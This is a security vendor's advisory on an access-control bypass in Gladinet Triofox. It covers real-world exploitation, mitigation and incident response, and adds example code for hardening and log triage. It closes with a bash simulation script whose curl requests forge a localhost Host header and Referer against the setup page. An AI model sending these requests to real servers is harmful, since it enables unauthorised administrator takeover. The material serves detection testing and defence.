SOC Prime Bias: Critical

11 Nov 2025 17:08

CVE-2025-12480: The SOC Report on Unauthenticated Access Control Vulnerability in Gladinet’s Triofox

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Analysis

An improper access‑control vulnerability tracked as CVE‑2025‑12480 in Gladinet Triofox allowed unauthenticated attackers to bypass authentication entirely, access initial configuration pages even after setup, create new administrator accounts and then abuse built‑in features to execute arbitrary payloads. Given its high severity (CVSS 9.1) and real‑world exploitation, this bug poses a serious risk to organizations running vulnerable versions.

Investigation

Threat researchers at Mandiant (via Google Cloud) found that as early as August 24, 2025, threat cluster UNC6485 exploited the flaw by submitting HTTP requests with a manipulated Host header set to “localhost,” thereby bypassing the check in the function CanRunCriticalPage() and accessing setup pages like AdminDatabase.aspx and AdminAccount.aspx. Once inside, the attackers used the product’s anti‑virus configuration feature (which ran with SYSTEM privileges) to deploy a malicious batch script that downloaded a disguised payload (e.g., Zoho UEMS installer) and then installed remote access tools (Zoho Assist, AnyDesk) and established SSH reverse tunnels.
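The bypass described above hinges on the server treating a client-supplied header as evidence that a request is local. The Python sketch below is an added illustration, not Triofox's code and not the function Mandiant analysed: the request structure, the names can_run_critical_page_trusting_host and can_run_critical_page_hardened, and the sample requests are all hypothetical. It puts the weak pattern beside a hardened check that closes the setup pages once initial setup has completed and decides "local" from the transport peer address rather than from any header.

```python
"""Added illustration (hypothetical, not Gladinet's implementation): why a
Host-header comparison is not an access control, and a hardened alternative.
"""
import ipaddress
from dataclasses import dataclass, field

# Pages the report names as reachable through the bypass.
SETUP_PAGES = {"/AdminDatabase.aspx", "/AdminAccount.aspx"}


@dataclass
class Request:
    """Minimal stand-in for a server-side request object (hypothetical)."""
    path: str
    remote_addr: str                # peer address seen on the accepted socket
    headers: dict = field(default_factory=dict)

    def header(self, name):
        # HTTP header names are case-insensitive.
        for key, value in self.headers.items():
            if key.lower() == name.lower():
                return value
        return None


def can_run_critical_page_trusting_host(req):
    """Weak pattern: the client-supplied Host header is taken as proof that
    the call originates on the server itself. Because any client can send
    `Host: localhost`, this check passes from anywhere on the network."""
    if req.path not in SETUP_PAGES:
        return True                 # not a critical page; normal authz applies
    host = (req.header("Host") or "").lower().split(":")[0]
    return host in ("localhost", "127.0.0.1")


def can_run_critical_page_hardened(req, setup_completed):
    """Hardened pattern with two independent gates:
    1. once initial setup is complete the setup pages are closed for everyone;
    2. while setup is still pending, 'local' is decided from the peer address
       of the connection, which a remote client cannot set in a header."""
    if req.path not in SETUP_PAGES:
        return True
    if setup_completed:
        return False
    try:
        return ipaddress.ip_address(req.remote_addr).is_loopback
    except ValueError:
        return False                # unparsable peer address: deny


if __name__ == "__main__":
    # Constructed request: remote client forging the Host header.
    forged = Request("/AdminDatabase.aspx", "203.0.113.10", {"Host": "localhost"})
    print("weak check lets forged request through:",
          can_run_critical_page_trusting_host(forged))
    print("hardened check (setup done):",
          can_run_critical_page_hardened(forged, setup_completed=True))
```

The second gate only holds when the application sees the real client address; behind a reverse proxy the peer is the proxy, and "local" must then come from the proxy's own trusted configuration, never from a forwardable header. The first gate is the one that matters most here: a setup page that no longer exists after setup cannot be reached by any header trick.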

Mitigation

Organizations should ensure that they have upgraded Triofox to version 16.7.10368.56560 (or later), which resolves access to the initial configuration pages after setup. Additional mitigations include auditing and disabling unused native administrator accounts, restricting access to management interfaces by IP or network segment, verifying that the anti‑virus feature does not allow arbitrary path configuration or execution of untrusted binaries, and monitoring for anomalous outbound SSH/port 433 or RDP tunnelling.

Response

If you suspect compromise of a Triofox server, isolate the affected host immediately, review HTTP logs for suspicious Host header values (e.g., “localhost”), examine for unauthorized admin account creation, and look for evidence of malicious file uploads, reverse‑tunnel tooling, or unusual process execution from the Triofox service. Then re‑image or restore the host with the patched software version, reset affected credentials and rotate credentials on auxiliary tools, and report the incident to your national CERT or security authority. Finally, update your threat‑hunting or SIEM rules to detect this attack chain (authentication bypass → new admin account → antivirus path abuse → payload download → remote access tool installation) going forward.
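To make the log-review step concrete, the following is an added Python example, not SOC Prime's or Gladinet's code, that triages IIS-style W3C access log lines for the indicators named above: a Host header of localhost arriving from a non-loopback client, a Referer of http://localhost/, and setup pages still being served to remote clients after setup. It assumes cs-host and cs(Referer) logging are enabled (IIS does not log cs-host by default) and that the field names follow the W3C directive; the log lines are constructed for the example, not captured from a real incident.

```python
"""Added example (not part of the SOC Prime report): triage of W3C access logs
for the CVE-2025-12480 request pattern. Sample log lines are constructed.
"""
import ipaddress

SETUP_PAGES = {"/admindatabase.aspx", "/adminaccount.aspx"}
LOOPBACK_HOST_VALUES = {"localhost", "127.0.0.1"}

# Constructed sample: a forged-Host hit, a localhost-Referer hit, a benign
# request to the site root, and a genuine local hit from the server console.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) cs-host sc-status
2025-08-24 09:12:01 10.0.0.5 GET /AdminDatabase.aspx - 443 - 203.0.113.10 Mozilla/5.0 - localhost 200
2025-08-24 09:12:05 10.0.0.5 POST /AdminAccount.aspx - 443 - 203.0.113.10 Mozilla/5.0 http://localhost/AdminDatabase.aspx triofox.example.internal 302
2025-08-24 09:15:00 10.0.0.5 GET / - 443 - 198.51.100.7 Mozilla/5.0 - triofox.example.internal 200
2025-08-24 09:16:00 10.0.0.5 GET /AdminAccount.aspx - 443 admin 127.0.0.1 Mozilla/5.0 - localhost 200
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields line,
    so a different column order in a real log still works."""
    fields = None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue            # malformed entry; a real pipeline would count it
        entry = dict(zip(fields, parts))
        entry["_line"] = lineno
        yield entry


def is_loopback_ip(value):
    try:
        return ipaddress.ip_address(value).is_loopback
    except ValueError:
        return False


def find_suspicious(text, setup_completed=True):
    """Return (line, uri, client_ip, reason) tuples for setup-page requests
    matching any of the three indicators from the report."""
    findings = []
    for e in parse_w3c(text):
        uri = e.get("cs-uri-stem", "-")
        if uri.lower() not in SETUP_PAGES:
            continue
        client_ip = e.get("c-ip", "-")
        host = e.get("cs-host", "-").lower()
        referer = e.get("cs(Referer)", "-").lower()
        status = e.get("sc-status", "-")
        reasons = []
        if host in LOOPBACK_HOST_VALUES and not is_loopback_ip(client_ip):
            reasons.append("Host header claims localhost but client IP is remote")
        if referer.startswith("http://localhost/"):
            reasons.append("Referer points at http://localhost/")
        if setup_completed and status.startswith("2") and not is_loopback_ip(client_ip):
            reasons.append("setup page served to a remote client after setup")
        for reason in reasons:
            findings.append((e["_line"], uri, client_ip, reason))
    return findings


if __name__ == "__main__":
    for line, uri, ip, reason in find_suspicious(SAMPLE_LOG):
        print(f"line {line}: {ip} -> {uri}: {reason}")
```

The genuine console access on the last sample line produces no finding because the client address really is loopback; the forged request produces two findings because it both lies about Host and succeeds against a setup page after setup. A complete hunt would join these hits with the later stages of the chain the report lists (new administrator accounts, antivirus path changes, child processes of the Triofox service), which this example does not cover.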

Attack Flow

Simulation Instructions

  • Attack Narrative & Commands:
    An attacker, having identified the vulnerable AdminDatabase.aspx endpoint, crafts an HTTP GET request that sets the Host header to localhost. This tricks the application into treating the request as an internal call, potentially bypassing access controls and enabling further exploitation (e.g., uploading a web shell). The attacker also sends a secondary request in which the Referer header contains http://localhost/ to satisfy the alternative detection condition. Both requests are issued with curl so that the raw headers are fully controlled.

  • Regression Test Script:

    #!/usr/bin/env bash
    # -------------------------------------------------
    # Simulate Host Header attack against AdminDatabase.aspx
    # Two requests, as described in the narrative above:
    # a forged Host header and a localhost Referer.
    # -------------------------------------------------
    set -u

    # TARGET may be overridden from the environment for the test host.
    TARGET="${TARGET:-http://vulnerable-webapp.example.com}"
    ENDPOINT="/AdminDatabase.aspx"

    echo "[*] Sending GET request with malicious Host header (selection2)..."
    curl -s -o /dev/null -w "%{http_code}\n" \
         -H "Host: localhost" \
         -H "User-Agent: Mozilla/5.0" \
         "${TARGET}${ENDPOINT}"

    echo "[*] Sending GET request with localhost Referer header (alternative condition)..."
    curl -s -o /dev/null -w "%{http_code}\n" \
         -H "Referer: http://localhost/" \
         -H "User-Agent: Mozilla/5.0" \
         "${TARGET}${ENDPOINT}"